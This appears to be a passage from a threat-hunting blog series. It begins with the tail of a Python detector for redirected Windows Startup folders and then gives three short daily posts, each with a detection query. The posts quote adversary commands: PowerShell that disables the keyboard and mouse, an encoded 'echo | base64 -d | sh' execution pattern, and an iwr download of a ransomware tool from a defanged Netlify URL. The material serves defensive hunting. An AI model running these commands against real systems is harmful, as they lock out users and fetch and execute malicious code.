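def is_startup_redirect(event: Dict[str, str], env: Dict[str, str]) -> bool:
    """Suspicious if Startup under (User) Shell Folders no longer resolves to the default."""
    key = event["reg_key_path"].lower().rstrip("\\")
    if event["reg_value_name"].lower() != "startup" or not key.endswith(STARTUP_KEYS):
        return False
    actual = ntpath.normpath(expand_env(event["reg_value_data"], env)).lower()
    expected = ntpath.normpath(ntpath.join(env["USERPROFILE"], DEFAULT_STARTUP)).lower()
    return actual != expected


def hunt_startup_redirects(events: List[Dict[str, str]], env: Dict[str, str]) -> List[str]:
    """Return the value data of every event that redirects the Startup folder."""
    return [ev["reg_value_data"] for ev in events if is_startup_redirect(ev, env)]


# Constructed environment and events for one user profile.
ENV = {"USERPROFILE": r"C:\Users\alice",
       "APPDATA": r"C:\Users\alice\AppData\Roaming",
       "LOCALAPPDATA": r"C:\Users\alice\AppData\Local"}
USF = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
SF = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
EVENTS = [
    {"reg_key_path": USF, "reg_value_name": "Startup",          # Windows default, unexpanded
     "reg_value_data": r"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"},
    {"reg_key_path": SF, "reg_value_name": "Startup",           # Windows default, expanded
     "reg_value_data": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"},
    {"reg_key_path": USF, "reg_value_name": "Startup",          # MuddyViper-style redirect
     "reg_value_data": r"%LOCALAPPDATA%\Microsoft\Windows\PPBCompatCache\ManagerCache"},
    {"reg_key_path": USF, "reg_value_name": "Startup",          # passes the suffix exclusion
     "reg_value_data": r"C:\Evil\Programs\Startup"},
    {"reg_key_path": USF, "reg_value_name": "Desktop",          # other folder, out of scope
     "reg_value_data": r"C:\Evil"},
]

if __name__ == "__main__":
    for data in hunt_startup_redirects(EVENTS, ENV):
        print("redirected Startup ->", data, "| suffix check flags it:", suffix_check(data))
```

Expanding with the event's own user profile rather than the collector's environment matters: the same %USERPROFILE% value is correct for every user, and a hard-coded C:\Users\bob\... path set in alice's hive is itself a redirect.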

337. Adversaries Disable Plug and Play Devices

Hello everyone! Adversaries love PowerShell, as they can use it to solve hundreds of tasks. Let's look at another curious example. According to the report, the adversary leveraged PowerShell to disable Plug and Play devices, specifically the keyboard and the mouse:
Get-PnpDevice -FriendlyName 'HID Keyboard Device' | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false}
Get-PnpDevice -Class Keyboard | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false}
Get-PnpDevice -Class Mouse | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false}
Write-Host "Devices disabled."
Locking out the user's input devices this way is not a very common event, so if you collect ScriptBlock logging, you have another detection or hunting opportunity:
event_type: "scriptexecutionwin" AND script_text: "Disable-PnpDevice"
See you tomorrow!

336. Adversaries Keep Using Phishing to Compromise Linux Systems

Hello everyone! I have already mentioned that threat actors have started to use phishing emails to attack Linux systems. No, not globally. At least, for now. As you know, APT36 usually uses malicious .desktop files and hides the malicious logic inside encoded data, for example:
sh -c "echo [base64_encoded_data] | base64 -d | sh"
Yes, we can see similar commands executed legitimately, and yes, it's another hunting opportunity:
event_type: "processcreatenix" AND cmdline: ("echo" AND "base64" AND "d" AND "sh")
Depending on how your engine tokenizes command lines, "d" may be too loose; prefer matching -d or --decode explicitly. See you tomorrow!

335. Adversaries Abuse Netlify for Malware Delivery

Hello everyone! Today we'll look at another example of Ingress Tool Transfer (T1105). This time adversaries used Netlify to store malicious files. According to the report, Fog ransomware affiliates used PowerShell to download malicious files, for example:
iwr -uri 'hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe' -outfile $temppath
As you can see, they used Netlify, a legitimate platform for building, deploying and scaling web apps, to store those files. To tell the truth, it's not the first time I've seen adversaries use it, so it's another good target for hunting:
event_type: "dnsreqwin" AND dns_rname: "netlify.app"
See you tomorrow!